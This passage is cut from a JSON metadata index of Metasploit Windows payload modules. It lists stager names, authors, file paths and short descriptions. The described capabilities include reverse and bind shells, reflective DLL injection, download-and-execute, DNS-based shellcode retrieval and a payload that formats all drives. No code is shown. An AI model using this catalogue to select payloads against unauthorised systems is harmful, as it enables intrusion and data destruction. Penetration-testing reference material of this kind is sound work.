"payload/windows/dllinject/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "vlad902 " - ], - "description": "Inject a DLL via a reflective loader.\n\nListen for a connection (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_windows/dllinject/bind_tcp": { - "name": "Reflective DLL Injection, Bind TCP Stager (Windows x86)", - "fullname": "payload/windows/dllinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape " - ], - "description": "Inject a DLL via a reflective loader.\n\nListen for a connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_tcp" - }, - "payload_windows/dllinject/bind_tcp_rc4": { - "name": "Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/dllinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Inject a DLL via a reflective loader.\n\nListen for a connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_windows/dllinject/bind_tcp_uuid": { - "name": "Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/dllinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Inject a DLL via a reflective loader.\n\nListen for a connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_windows/dllinject/find_tag": { - "name": "Reflective DLL Injection, Find Tag Ordinal Stager", - "fullname": "payload/windows/dllinject/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "skape " - ], - "description": "Inject a DLL via a reflective loader.\n\nUse an established connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/findtag_ord.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/findtag_ord" - }, - "payload_windows/dllinject/reverse_http": { - "name": "Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)", - "fullname": "payload/windows/dllinject/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm " - ], - "description": "Inject a DLL via a reflective loader.\n\nTunnel communication over HTTP (Windows wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_http.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_http" - }, - "payload_windows/dllinject/reverse_http_proxy_pstore": { - "name": "Reflective DLL Injection, Reverse HTTP Stager Proxy", - "fullname": "payload/windows/dllinject/reverse_http_proxy_pstore", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm " - ], - "description": "Inject a DLL via a reflective loader.\n\nTunnel communication over HTTP", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_http_proxy_pstore", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_http_proxy_pstore" - }, - "payload_windows/dllinject/reverse_ipv6_tcp": { - "name": "Reflective DLL Injection, Reverse TCP Stager (IPv6)", - "fullname": "payload/windows/dllinject/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape " - ], - "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker over IPv6", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_windows/dllinject/reverse_nonx_tcp": { - "name": "Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/windows/dllinject/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "vlad902 " - ], - "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_windows/dllinject/reverse_ord_tcp": { - "name": "Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/windows/dllinject/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "spoonm " - ], - "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_windows/dllinject/reverse_tcp": { - "name": "Reflective DLL Injection, Reverse TCP Stager", - "fullname": "payload/windows/dllinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape " - ], - "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp" - }, - "payload_windows/dllinject/reverse_tcp_allports": { - "name": "Reflective DLL Injection, Reverse All-Port TCP Stager", - "fullname": "payload/windows/dllinject/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape " - ], - "description": "Inject a DLL via a reflective loader.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_windows/dllinject/reverse_tcp_dns": { - "name": "Reflective DLL Injection, Reverse TCP Stager (DNS)", - "fullname": "payload/windows/dllinject/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "RageLtMan" - ], - "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_windows/dllinject/reverse_tcp_rc4": { - "name": "Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/dllinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_windows/dllinject/reverse_tcp_rc4_dns": { - "name": "Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/windows/dllinject/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_windows/dllinject/reverse_tcp_uuid": { - "name": "Reflective DLL Injection, Reverse TCP Stager with UUID Support", - "fullname": "payload/windows/dllinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker with UUID Support", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_windows/dllinject/reverse_winhttp": { - "name": "Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)", - "fullname": "payload/windows/dllinject/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "Borja Merino " - ], - "description": "Inject a DLL via a reflective loader.\n\nTunnel communication over HTTP (Windows winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_winhttp" - }, - "payload_windows/dns_txt_query_exec": { - "name": "DNS TXT Record Payload Download and Execution", - "fullname": "payload/windows/dns_txt_query_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "corelanc0d3r " - ], - "description": "Performs a TXT query against a series of DNS record(s) and executes the returned x86 shellcode. The DNSZONE\n option is used as the base name to iterate over. The payload will first request the TXT contents of the a\n hostname, followed by b, then c, etc. until there are no more records. For each record that is returned, exactly\n 255 bytes from it are copied into a buffer that is eventually executed. This buffer should be encoded using\n x86/alpha_mixed with the BufferRegister option set to EDI.", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/dns_txt_query_exec.rb", - "is_install_path": true, - "ref_name": "windows/dns_txt_query_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/download_exec": { - "name": "Windows Executable Download (http,https,ftp) and Execute", - "fullname": "payload/windows/download_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "corelanc0d3r " - ], - "description": "Download an EXE from an HTTP(S)/FTP URL and execute it", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/download_exec.rb", - "is_install_path": true, - "ref_name": "windows/download_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/exec": { - "name": "Windows Execute Command", - "fullname": "payload/windows/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf " - ], - "description": "Execute an arbitrary command", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/exec.rb", - "is_install_path": true, - "ref_name": "windows/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/format_all_drives": { - "name": "Windows Drive Formatter", - "fullname": "payload/windows/format_all_drives", - "aliases": [], - "rank": 0, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ashfaq Ansari ", - "Ruei-Min Jiang " - ], - "description": "This payload formats all mounted disks in Windows (aka ShellcodeOfDeath).\n\n After formatting, this payload sets the volume label to the string specified in\n the VOLUMELABEL option. If the code is unable to access a drive for any reason,\n it skips the drive and proceeds to the next volume.", - "references": [ - "URL-http://hacksys.vfreaks.com/research/shellcode-of-death.html", - "URL-https://github.com/hacksysteam/ShellcodeOfDeath" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/format_all_drives.rb", - "is_install_path": true, - "ref_name": "windows/format_all_drives", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "ShellcodeOfDeath" - ] - }, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/loadlibrary": { - "name": "Windows LoadLibrary Path", - "fullname": "payload/windows/loadlibrary", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm " - ], - "description": "Load an arbitrary library path", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/loadlibrary.rb", - "is_install_path": true, - "ref_name": "windows/loadlibrary", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/messagebox": { - "name": "Windows MessageBox", - "fullname": "payload/windows/messagebox", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "corelanc0d3r ", - "jduck " - ], - "description": "Spawns a dialog via MessageBox using a customizable title, text & icon", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-11-28 06:39:07 +0000", - "path": "/modules/payloads/singles/windows/messagebox.rb", - "is_install_path": true, - "ref_name": "windows/messagebox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/meterpreter/bind_hidden_ipknock_tcp": { - "name": "Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager", - "fullname": "payload/windows/meterpreter/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "Borja Merino " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_windows/meterpreter/bind_hidden_tcp": { - "name": "Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager", - "fullname": "payload/windows/meterpreter/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "Borja Merino " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_windows/meterpreter/bind_ipv6_tcp": { - "name": "Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/windows/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_windows/meterpreter/bind_ipv6_tcp_uuid": { - "name": "Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_windows/meterpreter/bind_named_pipe": { - "name": "Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager", - "fullname": "payload/windows/meterpreter/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "UserExistsError" - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a pipe connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_windows/meterpreter/bind_nonx_tcp": { - "name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)", - "fullname": "payload/windows/meterpreter/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "vlad902 " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": 